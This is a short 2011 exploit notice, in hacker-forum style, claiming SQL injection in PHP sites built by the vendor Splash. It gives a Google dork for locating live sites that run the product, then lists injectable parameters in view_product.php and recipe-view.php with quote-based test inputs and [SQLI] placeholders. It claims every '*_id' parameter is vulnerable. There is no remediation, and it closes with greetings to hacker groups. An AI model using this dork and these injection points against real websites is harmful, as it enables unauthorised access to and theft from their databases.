Splash SQL Injection Vulnerability

######################################################### # Title : Splash SQL Injection Vulnerability # Author: Kalashinkov3 # Vendor: [www.splash.ie] # Email : kalashinkov3@Hotmail.fr # date : 21/4/2011 # Google Dork : intext:"Built by splash"inurl:*.php?id= # category : PHP [SQli] ######################################################### #<>Special Thanks To : Double canon.L <> ######################################################### *SQL injection Vulnerability* # http://[localhost]/view_product.php?id='226 # http://[localhost]/view_product.php?id=[SQLI] # http://[localhost]/recipe-view.php?id='61'61 # http://[localhost]/recipe-view.php?id=[SQLI] = = ===== # all php files *.php?*_id=[sqli] are vulnerable # = = # http://[localhost]/*.php?id='89 /*.php?id=[SQLI] =============================================================== # Greets To : All Algerians Hacker'S ;) & All mmembre 1337Day.com # =============================================================== #